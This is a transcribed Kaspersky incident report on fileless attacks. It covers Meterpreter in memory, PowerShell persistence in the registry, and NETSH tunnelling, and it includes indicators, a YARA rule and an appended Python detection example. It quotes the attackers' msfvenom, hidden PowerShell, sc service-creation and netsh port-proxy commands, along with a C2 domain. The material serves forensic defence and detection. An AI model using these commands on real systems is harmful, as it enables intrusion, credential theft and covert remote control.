Fileless Attacks Against Enterprise Networks

Transcription

Kaspersky Enterprise Cybersecurity
Fileless attacks against enterprise networks
www.kaspersky.com #truecybersecurity

During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memory and hard drives. Unfortunately, each of these storage media has a limited timeframe during which the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack, the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of the needed data and, depending on the drive's activity, forensic specialists may extract data up to a year after an incident. That is why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping onto the hard drive and starting its malicious MSI package, it removes the package from the hard drive by renaming the file and leaves part of itself in memory together with a payload. That is why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that attackers install in the network. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using standard Windows utilities like "SC" and "NETSH".

This threat was originally discovered by a bank's security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab's product detection names for such kinds of threat are MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit.
Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally, it was discovered that the NETSH utility was used for tunnelling traffic from the victim's host to the attacker's C2.

[Figure: This script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM.]

These kinds of scripts may be generated using the Metasploit msfvenom utility with the following command-line options:

    msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd

We know that the Metasploit framework was used to generate scripts like the following one:

    %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e QAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAa

After the successful generation of a script, the attackers used the SC utility to install a malicious service (which will execute the previous script) on the target host. This can be done, for example, using the following command:

    sc \\target_name create ATITscUA binpath= "C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQA" start= manual

The next step after installing the malicious service would be to set up tunnels to access the infected machine from remote hosts, for example using the following command:

    netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0

That would result in all network traffic from 10.10.1.11:4444 being forwarded to 10.10.1.12:8080. This technique of setting up proxy tunnels provides the attackers with the ability to control any PowerShell-infected host from remote Internet hosts.

The use of the "SC" and "NETSH" utilities requires administrator privileges on both the local and the remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to achieve this, attackers used credentials from service accounts with administrative privileges (for example backup, the service for the remote task scheduler, etc.) grabbed by Mimikatz.

[Figure: Over 140 enterprises hit around the world, including banks, telecoms and government organizations.
1. Target's servers are hacked using a known exploit for an unpatched vulnerability.
2. Attackers combine and adapt well-known tools (Meterpreter, PowerShell scripts) to infect the computer.
3. Code hides in memory and the Windows registry: no malware files on the hard drive, "invisible" to security whitelists. Gathers info, e.g. passwords of system administrators.
4. Use of standard utilities (NETSH) for a tunnel to the C2 server, providing attackers with remote access.
5. Nearly all traces disappear on reboot.
6. Lack of malware artefacts makes detection and investigation difficult.
© 2017 AO Kaspersky Lab. All Rights Reserved.]

Features

The analysis of memory dumps and Windows registries from affected machines allowed us to restore both Meterpreter and Mimikatz.
These tools were used to collect passwords of system administrators and for the remote administration of infected hosts.

In order to get the PowerShell payload used by the attackers from the memory dumps, we used the following BASH commands:

    cat mal_powershell.ps1_4 | cut -f12 -d" " | base64 -di | cut -f8 -d\' | base64 -di | zcat - | cut -f2 -d\( | cut -f2 -d\" | less | grep \/ | base64 -di | hd

[Figure: Part of the code responsible for downloading Meterpreter from "adobeupdates.sytes[.]net"]

Victims

Using the Kaspersky Security Network we found more than 140 enterprise networks infected with malicious PowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and HEUR:Trojan.Multi.Powecod.a. The table below shows the number of infections per country. However, we cannot confirm that all of them were infected by the same attacker.

[Figure: The hidden-malware enterprise attacks: victim geography. Over 140 enterprises in 40 countries affected. Hit enterprises: government organizations, telecommunication companies. Countries shown include Ecuador, USA, Brazil, Spain, UK, France, Uganda and Kenya; a small number of infections have also been found in Austria, Cyprus, Madagascar, Saudi Arabia, Mongolia, Ukraine, Cambodia, Indonesia, Morocco, Vatican City, Vietnam, Congo, Libya and Peru, among others.]

Attribution

During our analysis of the affected bank we learned that the attackers had used several third-level domains and domains in the .GA, .ML and .CF ccTLDs. The trick of using such domains is that they are free and have no WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, attribution is almost impossible. The closest groups with the same TTPs are GCMAN and Carbanak.

After successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no malware samples are needed for the successful exfiltration of a network and how standard and open-source utilities make attribution almost impossible.

Further details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on St. Maarten from 2 to 6 April, 2017. For more information please ...

Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry. Unfortunately, the use of common tools combined with different tricks makes detection very hard. In fact, detection of this attack would be possible in RAM, network and registry only. Please check the Appendix I - Indicators of Compromise section for more details on how to detect malicious activity related to this fileless PowerShell attack.

Appendix I – Indicators of Compromise

To find the host used by an attacker using the technique described for remote connections and password collection, the following paths in the Windows registry should be analyzed:

    HKLM\SYSTEM\ControlSet001\services\ - path will be modified after using the SC utility
    ...4\tcp - path will be modified after using the NETSH utility

In unallocated space in the Windows registry, the following artefacts might be found:

    powershell.exe -nop -w hidden -e
    10.10.1.12/8080
    10.10.1.11/4444

Please note that these IPs are taken from the IR case in which we participated, so any other IP could be used by an eventual attacker. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of the NETSH utility for building tunnels.

Verdicts:
    MEM:Trojan.Win32.Cometer
    MEM:Trojan.Win32.Metasploit
    Trojan.Multi.GenAutorunReg.c
    HEUR:Trojan.Multi.Powecod

Appendix II – Yara Rules

    rule msf_or_tunnel_in_registry
    {
        strings:
            $port_number_in_registry = "/4444"
            $hidden_powershell_in_registry = "powershell.exe -nop -w hidden" wide
        condition:
            uint32(0) == 0x66676572 and any of them
    }
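As an added example (not code from the Kaspersky report), the following Python reproduces the logic of the Appendix II YARA rule over a registry hive image and recovers the script hidden behind an encoded PowerShell service command, which is the same UTF-16LE base64 decoding step the report's bash pipeline performs with base64 -di. The hive image and the encoded one-liner are constructed here, and the names HIVE_PATTERNS, scan_hive, decode_encoded_command and suspicious_service_binpath are this example's own.

```python
import base64
import re
from typing import List, Optional

# "regf" hive magic; the report's YARA rule checks uint32(0) == 0x66676572,
# the same four bytes read little-endian.
HIVE_MAGIC = b"regf"

# Artefacts the report lists in unallocated hive space: the NETSH tunnel port
# (ASCII) and the hidden PowerShell launcher (UTF-16LE, YARA's "wide").
HIVE_PATTERNS = {
    "port_number_in_registry": b"/4444",
    "hidden_powershell_in_registry": "powershell.exe -nop -w hidden".encode("utf-16le"),
}

# powershell.exe -e / -enc / -EncodedCommand takes base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def scan_hive(data: bytes) -> List[str]:
    """Equivalent of rule msf_or_tunnel_in_registry: hive magic AND any of them."""
    if data[:4] != HIVE_MAGIC:
        return []
    return [name for name, pat in HIVE_PATTERNS.items() if pat in data]

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind '-e <base64>' in a command line such as the
    service binpath installed with SC; None if absent or not valid base64."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def suspicious_service_binpath(binpath: str) -> bool:
    """Flag a service ImagePath that starts hidden PowerShell with an encoded
    command, the pattern the report's indicators describe."""
    low = binpath.lower()
    return "powershell" in low and "-w hidden" in low and decode_encoded_command(binpath) is not None

# Constructed samples (not from the incident): a benign one-liner encoded the
# way the attackers' binpath encodes its payload, and a fake hive image with
# the wide launcher string sitting in "unallocated" space.
SAMPLE_SCRIPT = "Write-Host 'constructed sample'"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_BINPATH = ("C:\\Windows\\system32\\cmd.exe /b /c start /b /min "
                  "powershell.exe -nop -w hidden -e " + SAMPLE_B64)
SAMPLE_HIVE = HIVE_MAGIC + b"\x00" * 4092 + HIVE_PATTERNS["hidden_powershell_in_registry"]
```

Run scan_hive over an exported hive (or a carved hive fragment from a memory image) and decode_encoded_command over each service ImagePath to get the same two signals the report's IoCs describe.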

Kaspersky Lab, Moscow, Russia
www.kaspersky.com
All about Internet security: www.securelist.com
Find a partner near you: www.kaspersky.com
© 2017 AO Kaspersky Lab. All rights reserved. Registered trademarks and service marks are the property of their respective owners.
